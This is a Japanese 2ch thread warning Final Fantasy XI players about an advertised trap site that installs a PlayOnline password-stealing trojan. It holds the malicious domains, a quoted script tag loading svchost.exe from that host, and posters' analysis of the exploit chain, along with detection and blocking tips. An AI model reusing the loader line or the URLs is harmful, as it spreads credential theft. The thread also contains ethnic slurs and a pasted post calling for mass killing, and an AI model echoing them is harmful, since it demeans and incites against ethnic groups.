罠サイトヤバス

MSN、Yahooなんかに広告出してる「花の雫FF11情報局」ヤバス。
ページ開くとウィルス。IPアドレスの所属は中華。
テラヤバス。

2

3

4

出し方:

http://www.yahoo.co.jp
http://www.msn.co.jp

で、検索欄に FF11 として検索するだけ。

でも、ウィルスソフト入ってない香具師にはオススメしない。

え？
これマジ？
ネタ…だよね？

怖くて調べられないよぅ！

>>1
サイト管理者乙

宣伝乙

AntiVirは、

C:\DOCUMENTS AND SETTINGS\***\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\S9MVCTIJ\SVCHOST[1].EXE

Is the Trojan horse TR/Copiet.B.1

として反応。

なぁ、電話番号載ってるんだけど…。
だいたいYahoo検索でスポンサーサイトに掲載されること自体ワケワカラン。

http://www.japan213.com/FFtop.htm

ウィルス

開いてみたが、ノートン先生は反応なし

開いたけどNAV反応なし

ヤフーヲッチャーってもうゴースト化してんじゃね？

http://www2.arearesearch.co.jp/ip-kensaku.html

ココで調べると、

検索結果
IPアドレス 211.100.26.182
ホスト名 対応するホスト名がありません
IPアドレス
　割当国　※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

コンテンツは全てパクりと思われる。

例えば、小説。
ググるとパクり元がすぐみっかる。

Avast!で発見。
Win32:Mhtplo-31
トロイらしい。
フレームとして使用している
http://www.1102213.com/ff11help/money.htm
にウィルスが仕込まれているようだ。

なんでそんな必死なん？

有益情報っぽのでアゲ

このトロイが、FFの為に作られたモノで、POLパスワード抜かれたら...。

ある日突然キャラ消されてて、装備品とか全部RMTに回される、と。

ここですか。●抜け
http://www.japan213.com●/

うお、だめじゃんｗｗｗｗ
http://www.●japan213.com/

■<これがDDoSの元です!!!
　　これですこれこれ!!!　　　　多分。

トロイ検知可能ソフト:

AntiVir http://ringonoki.net/tool/antiv/antivir.html
Avast! http://www.forest.impress.co.jp/lib/inet/security/antivirus/avast.html

踏んじゃった香具師はチェック汁。

注意age
って危険だと思ってるの漏れだけ？

何？
トロイ無いですよ？

いい宣伝になるもんな。









ふざけんな。

宣伝て何の宣伝？

今開いてみたけどやっぱりAntiVirが反応するyp。
トップページ開くまでに3回。

http://ja.wikipedia.org/wiki/%E9%AE%AB%E5%B3%B6%E4%BA%8B%E4%BB%B6

ここ参照に問題を回避しろ。

罠サイトの創作小説

http://www.japan213.com/suo.htm
（ここはウィルス無いみたい。）


パクり元

http://ff11-free.sakura.ne.jp/i/nove/00-00.html


罠サイトの防具

http://www.japan213.com/fang.htm


パクり元

http://homepage3.nifty.com/~ffxi/Shield.html

想定シナリオ


1. 中華 罠サイト作成 トロイ入りで踏むとPOLパスワードを抜く
2. 中華 罠サイトのURLをYahoo!とMSNに広告として出稿
3. FF11プレイヤー、Yahoo!とかMSNでFF11ワードで検索して罠サイト踏む
4. FF11プレイヤー、ある日ログインしたらキャラが消えてる。持ってた装備は中華によりRMTの餌食に。

こんな感じ。
どう？

トロイを検出しない香具師がいるのは、トロイができたてほやほやで
まだ国内ソフトでは対策出来てないからと桃割れ。

想定シナリオ（漏れに関する）


1. キャラ削除事件が相次ぐ

→ だから言ったじゃないか！（得意げ）

2. ナニも起きない

→ 漏れの警告のおかげでナニも起きなかったな！（得意げ）


スレ立った時点で漏れ得意げ確定。

見事につられたｗ

眠いから10文字いないでよろ

まだIEでの閲覧のみで感染するウィルスなんて存在するの？ｗ

あ、私IEじゃない
ていうかIE使ってる人ここにいるの？

http://www.1102213.com/ff11help/money.htm
このソースに
<SCRIPT LANGUAGE="Script" src="http://www.1102213.com/ff11help/svchost.exe"></SCRIPT>
の記述あり

PS2版ユーザーだが、気になったので調べてみた。
>>1 >>32のストーリーでほぼ大当たりだよ。
POLのパス抜きトロイの疑いが極めて高い。

www.japan213.com = www.1102213.com = 211.100.26.182（中国）

http://www●1102213●com/ff11help/money.htmにはWindowsのHTML HELPの
脆弱性（MS05-026あたりかな）を突くスクリプトが仕込まれている。これに
よってicyfox.chmという変造HTMLヘルプが実行されて、
http://www●1102213●com/ff11help/svchost.exeがダウンロード、実行さ
れる。これがパスワードを抜くトロイ本体。Norton AntiVirus 2005は無反
応だったけど、UPXによる圧縮を解いてバイナリファイルをのぞいたら怪し
げな文字列がたくさん見つかった。

即座に通報汁！！
国内からじゃ不正アクセスなんて容易に捕まえられるだろうけど
糞中国からじゃー泣き寝入りで終わるぞ！！

罠サイト踏んだことあるが…ｗ
当時は解約中だったけど…

なんかアダルトサイトの宣伝メールが来るようになったんだがそれは別件かｎ

>>37
IEコンポーネント使ってる奴がほとんじゃない？

帰宅したら解析が進んでて漏れの得意げ度がアップでつよ。

とか、アホなこと言ってないで早くY！なりMSNなりにタレコむべきなんだろうか。
でも、被害出てからじゃないと対応されないのかな。

カイシャはAntiVirだったけど自宅はVirusBusterなので怖くて踏めないyp

会社から不用意にサイトを閲覧するな

いやこれはわりとマジで

>>44
まったくですな。

でも、Y！で検索して一見個人サイトっぽいのが広告出稿してたら
つい押したくナンネ？

FF トロイ と来たらDDoSでしょう
そのサイト覗いた奴がDDoSの踏み台に使われてるんじゃねーの？

>45
第一に会社でポータルサイトを開かない。

「広告として上げられてるサイトを閲覧したら、ウィルス警告がでるんですが」
みたいな感じで警告画面のSS添付してメルっとけば、そのうち広告削除されると思うけど。
あえて泳がせて、被害者出てから官憲召喚でもそれはそれでいい祭りになるがなー

ノートン先生が反応しないならちょっと踏めないなぁ

>>48

だよナ。
漏れも後者の方が面白そうだと思って放置してたのだけど、あまりに
FF界で話題になんないから出来心でスレ立てた。

今も後悔していない。

Windowsのパッチをちゃんと適用していればページを開いても大丈夫そうだけど、
未知の脆弱性を突いてる可能性もあるから件のサイトは踏まないほうがよいかと。

・トロイと思われるsvchost.exeのUPX圧縮を解除
http://tune.ache-bang.com/~vg/outitem/up/img/6168.png

・圧縮を解いたsvchost.exeをバイナリエディタでのぞいた（見にくいかも）
http://tune.ache-bang.com/~vg/outitem/up/img/6169.png
http://tune.ache-bang.com/~vg/outitem/up/img/6171.png
http://tune.ache-bang.com/~vg/outitem/up/img/6172.png
http://tune.ache-bang.com/~vg/outitem/up/img/6173.png

svchost.exeはWindowsに含まれるネットワーク系のシステムプログラムで、通常は複数
起動されている。このトロイは偽装のために同じsvchost.exeという名前で常駐すると桃割れ。
リネージュかなんかのパス抜きトロイの亜種なんじゃないかな。で、一部のウイルス対策ソフトが検
出する。逆コンパイルはしてないけど、バイナリエディタでのぞいていると、スクリーンショットを撮って
www.japan213.comに送信するように見える。なんとなく。
それにしても、Nortonはこのテのトロイに弱すぎるにゃ orz~

漏れのもってるソフト反応しねーーーーｗｗ

age

sageてしまった。バイナリエディタでのぞいただけだから、トロイかどうかの判断は
みんなに任せるよ。Win版のFF持ってないし。

>>51
神降臨

c:\gameff11.txtってのが出来てたらアウトなのかにゃー。

単にSS集めるトロイだといいのだが、中華がわざわざそんな愉快なモンに
カネ払ってY！なりMSNなりののせないだろうし、usr\all\login_w.binって
文字列がテラヤバスな感じだし。

品定め用にSS見て、めぼしいキャラを乗っ取り？
これならピンポイントで高額収入得られそうだし。

pol.exeというキーワードがある辺りがアレだな

続き。

漏れのマシンには、
C:\Program Files\PlayOnline\SQUARE\PlayOnlineViewer\usr\all\login_w.bin
ってのがある。

開いてみると冒頭に
PlayOnline Login Setting File Ver 1.0
と書いてある。

ヤバス？

ヤフーなぁ、
最近検索エンジンやスポンサー掲載とかなにかと移行作業中だから見落としもあるだろうな。

さて、土日はさむしどう出るヤホー。


あとどことは言わんが、同じくユーザー向けルール改変中の某大手サイトも手続き関係ゆるゆる。

>>24
これいい、昨日医入れたノートン先生も見つけられなかったトロイだかウィルスだか発見

いや、FF11やってる奴やばすぎ。(^.^)

バスターで調べた人いる？

よく見ると漏れヤバスヤバスしか言ってない。

>>57
やっぱりそういうファイルがあるんだ。
そのファイルをhttp://www●japan213●com/ff11929/ff11.aspで
収集している希ガス。もしそうならきっとヤバス。

頼むから□eはとっとと中華ban汁！

奴等がいるのはユーザーに取ってなんのメリットがあるんだ？

■＜たくさん利益が出るのでユーザーによりよいゲーム環境として還元できます

sageてた…
踏んでないからわからないけど、本当なら被害でるよね。
スクエニはちゃんと対応するのか、それともユーザーが泣き寝入りすることになるのか…

マジヤバいなこれ・・・もう寝るけどageとくわ

以前フィッシングサイトは問題になってたからなぁ。
ID抜きトロイサイトならそれ以上の問題だね。



そういやそのフィッシングサイトの措置ってどうなったんだっけ？

［＋］＜面倒なので被害が出た次の週あたりに対応します。

こいつは新聞載りそうだのう

ソースの見方を教えれ
ググってもわからなかった

未知の脆弱性を突くタイプなら危険な気もするから、
踏んだ香具師はとりあえずPOLパスワード変更汁、とか言ってみるテスト
てか、駆除しないとどのみちまたパス抜かれるんだろうなｗ

アンチソフト入れて安心しきってる奴は注意しる
ノー�d先生なんてウンコソフトはさっさとアンスコしる

PlaoOnlineのメールフォームから■eには連絡をしておいた。
このスレッドも読んでくださいねとは書いたけど、2ちゃんを読みに来てくれるかなー。
Yahoo!とMSNには■eから連絡するでしょ。きっと。

レジストリの〜currentversion\runにexplorff.exeを登録、Cのルートにgameff11.txtを生成てのが
特徴か？あとは毎度おなじみのsvchost.exeをユーザ名で起動？

>68
カード会社なりが警告文出して終わったはず。
実効被害が出ないかぎり、官憲は動けないし。
このサイト自体も、今の状態だけでは黒とは言えなさげ。
IDなりが抜かれて他人がログインすれば「不正アクセス禁止法」にかかるけど。

山田ウイルスもsvchost.exeだったよなぁ

ﾉｰﾄﾝ先生の、罠ｺｰﾄﾞ見つけた瞬間ﾂｰﾙ強制終了させるｱﾚはもう無くなったの？
ｱﾚのせいでだいぶ前からﾉｰﾄﾝ使ってないな

■＜大変話題になって嬉しい

>>1
スレタイをもっと人に見られるようなタイトルにすればよかったな。

■＜確かに。反省している。

もっと中華業者の罠っぷりを出したほうが目を引くな

バスター搭載、IE開いて踏んでみた。直前に最新版にうｐして反応なし
この前のWindowsのうｐもやってあるが…ダメジャンヽ(；´д｀)ﾉ

ちなみに思うんだが、トップページのＳＳの下の紹介文
個人サイトにしちゃ過剰に広告じみてないか？普通こんな書き方するだろうか？

>>76
まだそんな子といってるのかｗ

とりあえず
WINDOWSフォルダに
「gameff11.txt」
てのがあるとやばいんだよね？？

どこかで踏んだかなと調べてみたけど
なかったので安心でおｋ？

>>84
gameff11.txtは、c:\直下と桃割れ。

さて、寝るので、みんな、age続けてちょ。

検索してもなさそうなので安心だぜー

FF11関連サイトでも既存のお気に入りサイトだけで
新しいサイトは安易に踏まないようにしなくちゃな。

でも早急に対応とか来るんでない？
■eもVerUPかなんかで外部に漏れないように対応汁！

>>1がもうちょっとマシならなあ
【残念です。】

スキャン結果出た。ちゃんとsvchost[1].exeありますた(;´д⊂)
バスターでも効果無なんで、興味半分で覗かないのが吉みたいだね
俺は全然この手の話は分からないんだが、TR/Copiet.B.1ってのはトロイのタイプのことなのかな

http://www.japan213.com/count/index.asp

>>89が、その罠サイト？

またさげちった・・

>>89
ｼﾅﾁｸ乙＾＾；；；；；；；；；；

にゃーん
　応援に来たにゃ

ｼﾅﾁｸが罠ｻｲﾄ＞＞89を張りやがったぞ！！
あろうことかネ実スレで！！

ひろゆきに報告だ！！

Avast!オススメ
やっぱり入れておいて良かった。

これは常に上げねばなるまい

収集されてるファイルって、POLのログイン名とパスワード保存している奴とかだったりしないか？

なに？マジネタな訳？

パス抜きかどうかは判らんが
ウィルスはマジ

よくわからんが、あげとくか

avastはほんとフリーとは思えんな

こういうの何でも踏む馬鹿は死んでも治らないからどうでもいいよ

>>1は社員でＦＡ
ヘタレで対策できないから、ここで書いてんだろｗ

よくわからんが注意喚起のためage

http://www●japan213●com/とhttp://www●1102213●com/が罠サイト。
今のところ、IPアドレスは211.100.26.182。これら2つのサイト内のペー
ジはいつ罠入りに差し替えられるか分からないので直リンはヤバス。

生意気にアクセス統計まで取ってやがる。簡体字中国語なんて全然読めな
いけど、使い捨て環境でこれを見たところ7月くらいから日本のFF関連掲示
板に誘導カキコをしていた。かなり悪質だな。

age

今北産業用にまとめてみるか

・MSNやYahooの検索サイトで広告を出している「花の雫FF11情報局」のページにトロイ発見
・ページを開くとウイルスに感染
・件のウイルスはAvast!で発見可能な様子
・もしかするとこんな展開？>>33
・ウイルスの中身？>>51
・その他>>55　>>57

適当にまとめてみたよ．訂正追加お願いします．

これが嘘だろうと真実だろうとFF関連のページには行きにくくなったなぁｗ

>>107
訂正します・・・・orz
・もしかするとこんな展開？>>32

これまじ？
検索したとき、たまに広告サイトとか踏むことあるんだけど。

あぶない…自分で汚くまとめたレスを投下してしまうところだった…
>>107さんGJ

これ本当にPOLID抜いてアイテムとか盗まれたらRMTしっかり規制しない■が悪いんだよな

>>111
いや、それはどうだろうｗ

これがDDoSの元のトロイだったりすることはないのかな？
俺すごく頭悪いこと言ってる？

ありゃ。酒飲みながら書いてたらたらスッキリしたまとめが。もったいないから
書き込ませて（´・ω・`）ネ実にもいい人がガッツリといるんだね。ありがとう。

---
【POL垢盗む】絶対踏むな！【中華サイト】
---
PlayOnlineのアカウント情報を窃取するために作られたと思われるWebサイトが
見つかった。Yahoo! JAPANやMSNで"FF11"をキーワードに検索したときにスポン
サーサイトとして表示される「花の雫FF11情報局」がそれだ。このサイトは中国
に設置されており、アクセスするとWindowsのセキュリティホールを突いてPOLの
アカウント／パスワードを盗むトロイの木馬プログラムが実行される可能性がある。

罠を仕込んだ中華サイトのURLは、http://www●japan213●com/と
http://www●1102213●com/だ（事故アクセス防止のためドットをデカくしてある）。
いずれのサイトもIPアドレスは同じで211.100.26.182（割り当ては共産中国）。
これらのサイト内にあるページはいつ罠入りのものに差し替えられるか分からない
ので不用意にアクセスしないようにしてほしい。

オラのマシンに、下のファイルあるよ。
C:\Program Files\PlayOnline\SQUARE\PlayOnlineViewer\usr\all\login_w.bin
これは、元からあるファイルなんじゃないかと。

問題のページは、別（ＦＦインスコしてない）マシンで踏んでみた。
なんか、"C:\gameff11.txt"がある人が、やべぇのかも。

でも、オレ（がトロイ作る）ならファイル送った後、消すだろうから、残ってねぇかもなぁ。

あげとく

>>114の続き

【スッキリシャッキリしたまとめ】>>107 >>108

【参考1】Norton AntiVirus 2005、Norton Internet Security 2005、ウイルスバス
ターでは防げない（>>12 >>13 >>39 >>82 >>88）。Avast!は「Win32:Mhtplo-31」と
して検出（>>17 >>24）。
【参考2】>>1 >>9 >>16 >>32 >>39 >>51 >>55 >>56 >>57 >>75
なお、スクウェアエニックスにはメールフォームから連絡済みです。 >>74

罠サイトにアクセスしてしまった人は、>>24 で紹介されているウイルス対策ソフト
でPCをチェックしておきましょう。

んでは、おやすみなさい。

こわいからネットカフェからアクセスするか…

ネカフェからのほうが倍やばいんじゃねぇか。
既に色々入れられてたりするし。

とりあえずageて寝る

ウィルスバスタ2005での対策
1.メイン画面を起動し、左の縦に並んだメニューの「パーソナルファイアウォール」をクリック
2.右の「パーソナルファイアウォール設定」をクリック
3.「パーソナルファイアウォオールを有効にする」にチェックが入っている事を確認
4.「プロファイルの編集」枠のプロファイル名に丸印が付いている列をクリック
5.鉛筆マークの編集アイコンをクリック
6.「プロファイルの設定」画面が開くので、「除外リスト」タブのプラスマークの「追加」ボタンをクリック
7.「除外リストの追加/編集」画面が開くので以下を設定
　・説明　「ＦＦ罠サイト」に変更
　・対象　すべてのアプリケーション
　・接続　受信
　・アクセス処理　拒否
　・プロトコル　すべて
　・ポート　すべてのポート
　・種類　ＩＰアドレス
　・ホスト名　空白
　・ＩＰアドレス　211 　100 　26 　182
9.ＯＫをクリック。同様に送信も拒否（7の設定内容で「接続」を「送信」で）

>>115
うん、それが正常みたい。そのファイルにPOLのアカウント情報が記録されているらしい。
トロイがそのファイルを罠サイトに送信するかもしれないってのが今回のヤバスなとこのひとつ。
漏れWindows版のFF持ってないからこれ以上は役に立てないのよ。スマソ。

キンタマもこんな調子で感染が広まったんだろうな
こわいにゃん

>>121 いい人だ〜〜。ありがとう〜。
>>103ではあんなに冷たかったのに（´・ω・`）
もしかして、これが今はやりのツンデレ？ （´д｀*）

ﾘｱﾙｳﾞｧﾅﾃﾞｨｰﾙで踏んできたら対応早いんじゃね？W

7月から罠サイトがあったらしいけど
国民生活センターのこれってもしかして

ttp://www.kokusen.go.jp/t_box/data/t_result0510.html
４）オンラインゲームの突然の利用停止
　「オンラインゲームを利用していたところ、身に覚えのない理由で突然アカウントを停止された。
運営業者に問い合わせても詳しい説明がされない」という情報が以前から寄せられています。

　情報が多く寄せられた運営業者に確認したところ、「アカウント停止された理由に覚えがないと
申し出があった場合再調査することもあるが、処分を覆すことはあまりない。
利用規約に『一切返金しない』と定めているため、返金等の対応はしていない」とのことでした。
今後、利用者に十分説明することや苦情処理体制を改善することを申し入れました。

ちょ・・・お前Int500くらいあるじゃにゃい？ｗｗｗｗｗ

>>124
うるせえな！黙ってろ！



設定・・・してから寝ろよ

マジでニュースになりそうなネタだな。
それにしても、やっぱり中華は糞だなage

これがニュースになって、■ｅが中華が糞って解ればいいのにな。。。




むりかなぁ、、、■だし。

遊んでる俺たち程には世間は何の関心もないし
■もサービス終了するまで臭い物には蓋精神で行くと思うよ

>>128
きゃーー（/ω＼）ツンデレの王子さまキターーーー！ﾓｼﾞﾓｼﾞ。
設定して、ヒゲとスネ毛剃ったら寝るわね。ﾓｼﾞｮﾓｼﾞｮ。

不覚にもわらた。

これってＰＣでFF11やってなかったら無害？

>>128
(*’-’)σ)´д｀)

>>133
Win版狙いだろうね〜

>>133
王子様にハタかれる前にマジレス。垢盗まれないけど変なプログラムが
仕込まれる（いわゆる感染）可能性があるので無害とはいえない。トロイの
挙動をキチンと検証するのはウイルス対策ソフトベンダーくらいしかないか
ら、ある程度信頼できる情報を得るには各社の情報ページをこまめに見る
しかない鴨。
でも、オンラインゲームのアカウント窃取を目的とするトロイは軽視されがち
で、あまりマトモに対応されてないみたい。ググった感じでは大手ではマカ
フィーが頑張ってる希ガスあるごんらどんくりぷとん。

寝る前にあげ
興味を持った人は>>114と>>117をチェック

なるほど、とりあえず>>24のサイトからＤＬして
検索してもる

age

>>74の続報。中身はないけど。プレステでログインしたら定型文の
返信メールが来ていました。報告はしたからよろしくねってな内容で
返事をして終了。適切な措置を執ってくれるものと期待しています。
シェービングタイムも終わったので寝ます。

このスレに興味を持った人は>>114と>>117をチェック！ GNあげ。

AVGは駄目なのかな
ttp://www.grisoft.com/

あげ

中華糞あげ

中華ってツール使ってんの？
挑発すげー遅いんだけど

age

出勤前にage

http://www●japan213●com
このサイト７月の上旬にはもうあった悪寒
そのころから罠が仕込んであったかどうかは不明

こうゆうのって実際、被害が出た場合ヤフーに請求すりゃいいのかね？
以前似たような事例で賠償金貰ってた例を見たことがあるけど。

ああ、このサイトでID抜かれたって証拠がないと無理かよく考えたら。

出勤前age

これは大きな祭りにせんといかんでしょう。

今まで、多種ゲームのパスワード抜くウイルスがあったけど
国内ゲーム（特にＦＦ１１）は標的にされなかった。
今後、亜種含めてたくさん出回る可能性大。

しかし、この手のウィルスは韓国産だと決まってたけど、中国産も
出たのか。さすがに犯罪国家はロクなことせんな。(´・ω・`)

>>31の１番上のＵＲＬにもウィルスあったぞ。。。

ｶﾞｲｼｭﾂかもしれんが
ここでもこのサイト取り上げられてる
ttp://vegalv50.nyx.bne.jp/misc/security/?id=case-site
どうも同じドメインでリネ2も狙ってるらしい

バイナリスキャンのやつに、FTPのパスっぽいのがあるな。

ウイルスはないってかいてあったから踏んだのがやばかったのか、ノートン先生なにも反応せず寝て起きたら見事にトロイひっかかってた( ´Д⊂ヽｳｪｪｪﾝ

前のレスにあったAnitiVirを使って今検出してる・・・

有益スレage

無欲の勝利

>>151
だからいつ罠ポイントが移動するか分からんと追記してあるだろうに…
好奇心は猫をも殺すのいい見本だ。
パクリサイト見に行っても損はあれど得は無いぞ。

おい、誰か件の公式掲示板とやらにスレ立てしてくれ。
それと、中国からのアクセスは問答無用でフィルタするよう提案してくれ。
マジ中華むかつく。中国出張のヤツはＦＦできなくなっても仕方ないだろ。

何故かあそこ、メルアド・パスワード登録できないんだよな。

超あげ

数年前までは、ノートン先生は信頼できたけど
最近はダメダメ。
とくに、スパイウウェア系を長年スルーしてきたツケを払うことになると思う。
最近スパイウウェアとウィルスの定義があいまいで
悪質なのが多い、なのに、ノートン先生はスパイウェアにはノータッチの姿勢だったし。
最近は少しがんばってるが、更新料金の値上げとか、意味不明なことやってるし・・・。
そろそろ見限り時かもしれん。

２ちゃんにこないFFユーザーにも分かるように
プレミアサイトに張る必要あるのかな？

でも私はウィルス知識ないから真偽わからんし

ちょまてて、どうやって消すんだ？教えてくれ
リネ2の方踏んじまったよｗｗｗ

おはにゃ〜
　応援あげにゃ〜

>>162

とりあえず>>24をみたらいいとおもふ

AntiVirインスコしてから例のサイトいったら
見事に反応した。

PlayOnline自体がローカルメモリ上にIDとパスが暗号化なしで展開される謎仕様

FF中にシャウトさせるプログラムなんて簡単にできるよ。つーかできたw

age

超ａｇｅ！

■＜おはようポマイら。たくさん神が降臨しててたいへん嬉しい。

【FFXI】特定アジアの真実：６ヵ国目【FFXI】

enjoykorea日韓翻訳掲示板ログより。

timethisso : 韓 - これだけ言いなさい. 在日たちが韓国に何が役に立つか? どうせ日本
人だ. 敢えて在日という名前で生きて行く理由は何か? 彼らはそのままごみであるだけ
jap0 : 韓 - 在日は, 韓国の名前を売り込んで日本に寄生している. 虫以下.
timethisso : 韓 - yorke>>お前も帰化したの? 構わない. 在日は全部消えなければなら
ない. 全部死になさい. 汚い日本と言う(のは)国に在日と言う(のは)名前がいると言うの
が恥ずかしい.
jap0 : 韓 - 税金恩恵を受けて, もうちょっと他人達より富裕に暮したい便法を使って
いるのだけ, チョクバリと違いない. 韓国の名前を売らないでね.
timethisso : 韓 - 正直在日に気にならない. 日本に住む韓国人がいると言うのが恥ずか
しい. 今すぐ皆殺しでもさせたい.訳もなく韓国名前を売り込む犬日本人とまったく同じだ.
日本に住んだから心が汚くて醜悪だ日本に住む韓国人がいると言うのが恥ずかしい. 今す
ぐ皆殺しでもさせたい.

http://live19.2ch.net/test/read.cgi/ogame/1129819622/l50

あーこれな、確かにヤヴァイわコレ。
私はキャッシュから見て、ウィルス仕込まれてないページ
だったけど、不用意に踏むと、ちょっとマズイと思う。
電話番号からして、関西方面だな…普通は載せないし怪しすぎる。
つか、ドメイン名からしてヤヴァス(IPドメインSEARCHで検索汁)。

感染すると、パスとかクラックされて…そんなのある訳ないじゃんｗ
とか思ってる人は、そういうウィルスもあるってことを
知っておいた方が良いと思うよ。

最近流行ってる罠ツール、支那が日本人に使わせないように
仕込んだと見て、間違いないな・・・必死過ぎて笑えんわィ。

優良スレ

ノートンじゃ検出されないヤツか・・・地に落ちたもんだ。
元々、Avastとかの方が軽い上に優れてる印象はあったがなｗ

学生やらは休日に災難だったな。ご愁傷様。オチしてニヤニヤさせて貰います

もひとつ仕組みがわからないのだが、
ログイン時にPassを入れるときに
Passの入力を引き抜かれるということ？
→これだとPC版でログインしたときに引き抜かれる
それともPassを自動入力にしてると
そのデータを引き抜かれる？
→これだとそこのHPにアクセスして感染した時点でヤバイことに…

どっちにしてもPassを定期的に変更しないとだめぽいね。

そんなにやばいのかｗｗｗｗｗｗｗｗｗｗｗｗ

生暖かくオチさせてもらうか

なんか最近ノートンは本当にダメだな

これって、まじで怖いな。
【????????】【させてくれませんか？】50.000G
シャウトはツールだったけど、
これも勝手に入れちゃおうとすれば入れれる訳だよね？
ツールの場合は犯罪にはならないけど、こっちは犯罪になる。
だけど無法地帯のシナ発だと…(;´ρ｀)

avast起動したら

ＤCOM　exploitからのの攻撃を遮断しました

ってでるんだけどこれってなんじゃらほい？
もしかして感染したトロイのやつかなぁ？(´・ω・)

そりゃスパイウェアの方じゃないか？
まあ誰しも一匹や二匹気付かずに飼ってたりするもんだが・・・・。

jigで見てみたけど、内容薄いサイトだな

BBSにも記念カキコしてきたお

>>180

さんくす　(・ω・)ノ

さっさと■に通報してやるべきでは？

■＜スレたての責任取って神たちのカキコをまとめた。

漏れてる有益情報あったら盛り込みヨロ。

---
【POL垢盗む？】絶対踏むな！【中華サイト】
---
PlayOnlineのアカウント情報を窃取するために作られたと思われるWebサイトが
見つかった。Yahoo! JAPANやMSNで"FF11"をキーワードに検索したときにスポン
サーサイトとして表示される「花の雫FF11情報局」がそれだ。このサイトは中国
に設置されており、アクセスするとWindowsのセキュリティホールを突いてPOLの
アカウント／パスワードを盗むトロイの木馬プログラムが実行される可能性がある。

罠を仕込んだ中華サイトのURLは、http://www●japan213●com/と
http://www●1102213●com/だ（事故アクセス防止のためドットをデカくしてある）。
いずれのサイトもIPアドレスは同じで211.100.26.182（割り当ては中国）。
これらのサイト内にあるページはいつ罠入りのものに差し替えられるか分からない
ので不用意にアクセスしないようにしてほしい。

【想定シナリオ】（前スレ >>32）
1. 中華 罠サイト作成 トロイ入りで踏むとPOLパスワードを抜く様に作る。コンテンツはパクり。(*1)
2. 中華 罠サイトのURLをYahoo!とMSNに広告として出稿。(*2)
3. FF11プレイヤー、Yahoo!とかMSNでFF11ワードで検索して罠サイト踏む
4. FF11プレイヤー、ある日ログインしたらキャラが消えてる。持ってた装備は中華によりRMTの餌食に。

(*1)
創作小説
http://ff11-free.sakura.ne.jp/i/nove/00-00.html
→ http://www●japan213●com/suo●htm
防具
http://homepage3.nifty.com/~ffxi/Shield.html
→ http://www●japan213●com/fang●htm

(2)
http://www.yahoo.co.jp
http://www.msn.co.jp
で、検索ワード「FF11」すれば見つかる。

【仕込まれるウィルスの解析】
http://www●1102213●com/ff11help/money.htmにはWindowsのHTML HELPの
脆弱性（MS05-026あたりかな）を突くスクリプトが仕込まれている。これに
よってicyfox.chmという変造HTMLヘルプが実行されて、
http://www●1102213●com/ff11help/svchost.exeがダウンロード、実行さ
れる。これがパスワードを抜くトロイ本体。Norton AntiVirus 2005は無反
応だったけど、UPXによる圧縮を解いてバイナリファイルをのぞいたら怪し
げな文字列がたくさん見つかった。
www.japan213.com = www.1102213.com = 211.100.26.182（中国）

【ウィルス内部に見つかったキーワード】
・usr\all\login_w.bin
→ C:\Program Files\PlayOnline\SQUARE\PlayOnlineViewer\usr\all\login_w.bin
というファイルあり。PlayOnlineのパスワード保存用？もしくはこのファイルにキーロガー
仕込まれる？

・pol.exe

・c:\gameff11.txt
→ 感染するとこのファイルが生成される？

【各ウィルス対策ソフトでの対応状況】
Norton AntiVirus 2005: 検出不可
Norton Internet Security 2005: 検出不可
ウイルスバスター: 検出不可
Avast!: 「Win32:Mhtplo-31」として検出
AntiVir: 「TR/Copiet.B.1」として検出。

【ウィルスバスタ2005での対策】
1.メイン画面を起動し、左の縦に並んだメニューの「パーソナルファイアウォール」をクリック
2.右の「パーソナルファイアウォール設定」をクリック
3.「パーソナルファイアウォオールを有効にする」にチェックが入っている事を確認
4.「プロファイルの編集」枠のプロファイル名に丸印が付いている列をクリック
5.鉛筆マークの編集アイコンをクリック
6.「プロファイルの設定」画面が開くので、「除外リスト」タブのプラスマークの「追加」ボタンをクリック
7.「除外リストの追加/編集」画面が開くので以下を設定
　・説明　「ＦＦ罠サイト」に変更
　・対象　すべてのアプリケーション
　・接続　受信
　・アクセス処理　拒否
　・プロトコル　すべて
　・ポート　すべてのポート
　・種類　ＩＰアドレス
　・ホスト名　空白
　・ＩＰアドレス　211 　100 　26 　182
9.ＯＫをクリック。同様に送信も拒否（7の設定内容で「接続」を「送信」で）

>>1さん
注意を促す目的で、まとめ情報を私のサイトに転載しても良いでしょうか？

以上まとめ。
>>184-189

あああう。連投規制ウザス！！


>>190
是非お願いします。

>>1さんＧＪ！
応援＆注意喚起age

>>191
ありがとうございます。

と言う訳でなんとなくネ実レベルではお知らせ出来た感じだし、
名無しに戻ります。

みんな、ありがとう。
大きな事件にならないといいのだけど。

ナニコレ・・・

みんな>>1に騙されてるｗｗｗ

elemenあたりにのせてくれねえかなあ
入り口がヤフーMSNであんま詳しくないヤツほどひっかかりそうだ。

>>188
Trojan-PSW.Win32.Lineage.hn
Other versions: .by, .ha
Aliases
Trojan-PSW.Win32.Lineage.hn (Kaspersky Lab) is also known as: PWS-Lineage (McAfee),
PWSteal.Lineage (Symantec), Trojan.PWS.Lineage (Doctor Web),
TSPY_LINEAGE.EN (Trend Micro), TR/Copiet.B.1 (H+BEDV), Trojan.Spy.Lineage-15 (ClamAV),
rj/Lineage.HQ (Panda)
Detection added Jun 24 2005
Behavior PSW Trojan

リネージュのパス抜くやつかね

ウイルスって言うよりはトロイじゃないの？

作った奴逮捕されるのまだー？

PWSteal.Lineage (Symantec)
http://www.norton.com/region/jp/avcenter/venc/data/jp-pwsteal.lineage.html

これの改変でFFパスを抜くようにしてあるのかな

つか、■eも早く公式に情報喚起するなり、システムメッセージなりの注意を促せよな

ctrl+alt+del押してみたら
svchost.exeが３つも起動中だよ(((( ；ﾟДﾟ)))

>>198
別に区別する必要ないでしょ
トロイと書くより
ウィルスと書いたほうが初心者に伝わりやすいし。

>>203
そうか・・・それはあるか

>>202
全部消せ、今すぐ消せ

>>199
中華じゃないのか？

日本で作成したサイトなん？

俺ＦＦ１１やってないLineageプレイヤーだけど、
罠サイトはリネでもあったよ。
支那運営のＲＭＴサイトに始まり、日本人運営の情報サイトに埋め込んだり、
しまいには、価格コムにハッキングしてスパイウェア埋め込んでた
それで、実際にハックされてアイテム全部取られた知り合いいたしな。
それを機会に支那に甘かったリネ運営のＮＣＪが重い腰を上げて、
支那をどんどんＢＡＮしている。
ただ、支那人はどうせＢＡＮされるならとハッキングが激しくなってきてる状況。
ＦＦ１１プレイヤーや特に情報サイト運営してる人は埋め込まれてないか気をつけたほうがいいよ

yahooとかでFF11検索しても出ないんだけど、どこ？

質問：svchost.exe ってなんですか？

